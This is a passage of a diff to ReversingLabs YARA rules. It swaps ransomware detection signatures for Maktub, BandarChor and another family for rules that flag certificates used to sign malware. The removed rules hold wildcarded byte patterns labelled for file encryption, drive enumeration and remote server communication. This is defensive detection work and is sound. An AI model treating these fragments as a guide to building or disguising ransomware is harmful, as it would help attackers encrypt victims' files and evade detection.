-            2B ?? 06 09 16 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 09 16 11 ?? 6F ?? ?? ?? ?? 11
-            ?? 11 ?? 6A D6 13 ?? 11 ?? 11 ?? FE ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 08
-            6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? DE ?? 2A
-        }
-		$enum_drives = {
-            00 00 28 ?? ?? ?? ?? 1F ?? 0A 18 0C 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 0C 28 ?? ?? ?? ?? 0D 1A
-            0C 09 13 ?? 16 13 ?? 11 ?? 11 ?? 8E 69 FE ?? 2C ?? 11 ?? 11 ?? 9A 13 ?? 1B 0C 11 ??
-            6F ?? ?? ?? ?? 2C ?? 1C 0C 11 ?? 6F ?? ?? ?? ?? 19 FE ?? 16 FE ?? 65 18 60 1A 60 11
-            ?? 6F ?? ?? ?? ?? 21 ?? ?? ?? ?? ?? ?? ?? ?? FE ?? 16 FE ?? 65 5F 16 FE ?? 2C ?? 1D
-            0C 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1E 0C 11 ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B
-        }
-		$file_search = {
-            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10]
-            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 0D 19 0C 19 8D ?? ?? ?? ??
-            25 16 [5-10] A2 25 17 [5-10] A2 25 18 [5-10] A2 13 04 1A 0C 02 28 ?? ?? ?? ?? 13 ?? 1B
-            0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? (30 | 3D) [1-4] 1C 0C 11 ?? 11 ?? 9A 28
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1D 0C 09 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 9A [5-10] 6F
-            ?? ?? ?? ?? 16 FE ?? 5F 11 ?? 11 ?? 9A 1F ?? 28 ?? ?? ?? ?? [5-10] 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 16 FE ?? 5F 11 ?? [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 5F 2C ?? 1E 0C 11 ?? 11 ??
-            9A 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? (38 | 2B) [1-4] 1F ?? 0C 02 28 ?? ?? ?? ??
-            13 ?? 1F ?? 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? 30 ?? 1F ?? 0C 11 ?? 11 ??
-            11 ?? 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE ?? 2C ?? 1F ?? 0C 11 ?? 11 ?? 9A 28 ?? ??
-            ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B ?? 1F ?? 0C 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F
-            ?? ?? ?? ?? 8E 69 17 DA 18 FE ?? 16 FE ?? 2C ?? 1F ?? 0C 02 16 28 ?? ?? ?? ?? DD ?? ??
-            ?? ?? 07 17 58 16 0B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? DE
-        }
-		$remote_server_communication_1 = {
-            00 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 9A [5-10] 28 ??
-            ?? ?? ?? 0B 02 [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 02 [5-10] 16 28 ?? ?? ??
-            ?? 16 FE ?? 39 ?? ?? ?? ?? 1D 8D ?? ?? ?? ?? 25 16 [5-10] A2 25 17 02 A2 25 18 [5-10] A2
-            25 19 7E ?? ?? ?? ?? A2 25 1A [5-10] A2 25 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1C [5-10]
-            A2 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ??
-            [5-10] 11 ?? 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07
-            28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? [5-10] 6F ?? ?? ?? ?? 11 ?? [5-10] 6F ?? ?? ?? ??
-            11 ?? 11 ?? 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ??
-            ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
-            74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $enum_drives and $file_search and $encrypt_files and $remote_server_communication_1
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shulan Hou" and pe.signatures [ i ] . serial == "74:70:2d:ff:5d:40:56:b8:47:d0:09:a2:26:5f:b1:b3" and 1469664000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Maktub : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Maktub ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "23ca4232-77ff-5519-b6b0-ccec6cb35fe1"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "20b95b80-94a9-51c3-9c6c-2a0ef75b0c0b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Maktub.yara#L1-L116"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15972-L15988"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ee3213213e9521f7d19ce6340cd2f98057c22b1188ceefc30c17c18b6ec54e20"
+		logic_hash = "aa8f0fe1517134b6e562c2accc46420a4f0afd77c3a7bbe98d551c54e68ed4c7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Maktub"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 51 8D B3 ?? ?? ?? ?? 8B CB 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 50 8B 43 ?? FF D0 8D
-            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            B3 ?? ?? ?? ?? FF D0 85 C0 74 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D0 85 C0 75 ?? FF 75 ?? 8B 43
-            ?? FF D0 5E 33 C0 5B 8B E5 5D C3 A1 ?? ?? ?? ?? 57 8B 7D ?? 85 C0 75 ?? FF 15 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? 85 C9 74
-            ?? 8B D1 33 C0 C1 E9 ?? F3 AB 8B CA 83 E1 ?? F3 AA 8B 7D ?? B9 ?? ?? ?? ?? 3B FE 76
-            ?? 8D 46 ?? 3B F8 73 ?? 8D 57 ?? 8D 70 ?? 8B FF 8A 06 8D 52 ?? 88 42 ?? 8D 76 ?? 49
-            75 ?? EB ?? 8B D7 2B D6 8A 06 8D 76 ?? 88 44 32 ?? 49 75 ?? E8 ?? ?? ?? ?? 89 83 ??
-            ?? ?? ?? 8D 4F ?? 8B 83 ?? ?? ?? ?? 89 47 ?? FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? FF 75 ?? 50 8B 43 ?? 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 85 C0 75 ?? A1
-            ?? ?? ?? ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ??
-            ?? ?? FF 75 ?? 8B 43 ?? FF D0 5F 5E 33 C0 5B 8B E5 5D C3 FF 75 ?? 8D 45 ?? 57 50 E8
-            ?? ?? ?? ?? 50 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? FF
-            75 ?? 8B 43 ?? FF D0 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$search_files = {
-            55 8B EC 83 EC ?? 53 56 57 8B F9 68 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 0F 84
-            ?? ?? ?? ?? 8B 47 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ??
-            FF D0 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4F ?? 8D 45 ?? 50 0F 57 C0 53 66 0F 13 45
-            ?? FF D1 85 C0 0F 84 ?? ?? ?? ?? 8B 75 ?? 8B C6 0B 45 ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF
-            72 ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 87 ?? ?? ?? ??
-            8B 55 ?? 8D 4A ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? FF 70 ?? 50 FF 31 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ??
-            FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 75 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? 85 C0
-            7C ?? 7F ?? 81 FE ?? ?? ?? ?? 72 ?? 50 8B 45 ?? 56 53 8B 1D ?? ?? ?? ?? 33 F6 51 8D
-            48 ?? 89 65 ?? 39 31 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 51 33 F6 89 65 ?? 89
-            01 8B 45 ?? 39 70 ?? 8D 48 ?? 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 89 01 8B CF
-            E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 E9 ?? ?? ?? ?? 8B 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 89 45 ?? 83 F8 ?? 75 ?? 8B 47 ?? 53 FF D0 33 FF E9
-            ?? ?? ?? ?? 51 8D 87 ?? ?? ?? ?? 8B CF 50 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45
-            ?? ?? ?? ?? ?? 51 FF 75 ?? 50 8B 47 ?? 53 FF D0 85 C0 75 ?? 8B 4D ?? E9 ?? ?? ?? ??
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 85 C0 74 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0
-            85 C0 75 ?? 8B 4D ?? EB ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ??
-            FF 75 ?? FF D0 85 C0 75 ?? 8B 4D ?? EB ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
-            75 ?? 8B 45 ?? 50 FF 75 ?? 8B 47 ?? FF D0 8B 4D ?? 85 C0 74 ?? 8B 45 ?? 3B 45 ?? 74
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 FF 75 ?? 8B 47 ?? FF D0
-            8B 47 ?? 56 FF D0 33 FF E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 FF 75
-            ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
-            ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
-            ?? ?? ?? 6A ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 45
-            ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 75 ??
-            8B 47 ?? 56 FF D0 33 FF EB ?? BF ?? ?? ?? ?? 83 C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ??
-            85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 56 6A ?? 50 FF D3 EB ?? 8B 47 ?? 53 FF D0 33 FF 8B 1D ?? ?? ?? ?? 8B 75 ?? 83
-            C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 50 FF D3 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$previous_encrypt_files = {
-            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8D 4D
-            ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF
-            77 ?? FF D3 8D 4D ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
-            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
-            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ??
-            FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF
-            30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89
-            B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
-            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
-            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7
-            ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D
-            4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ??
-            ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D
-            ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? 8D B7 ?? ?? ?? ?? FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8
-            ?? ?? ?? ?? 84 DB 74 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 ?? ?? ?? ?? 84 DB 0F 85 ??
-            ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and $previous_encrypt_files and $encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Freak Limited" and pe.signatures [ i ] . serial == "35:3b:1c:f7:86:6e:e0:b0:ac:dd:53:2d:0b:b1:a2:20" and 1558915200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bandarchor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BandarChor ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c645a081-7ff6-58fc-af8e-55f43f56d0ea"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "3fd458e6-bf5a-51f3-9b46-344e9f8e0ffe"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BandarChor.yara#L1-L97"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15990-L16006"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1c0c33ef7de089fc7ed6b364c7693499d1a93f79a48d6f2a5c375e47aea176bc"
+		logic_hash = "1aafe547b8645f07498bac6f0ffd6d5aefbac160aa7a6fb8d1d891e70701ce99"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BandarChor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_extensions_1 = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 51 53 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8B 95 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 85 F9 00 00 00 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 4F FE FF FF E9 ?? ?? ?? ?? 8D 95
-        }
-		$file_extensions_2 = {
-            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
-        }
-		$file_extensions_3 = {
-            8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ??
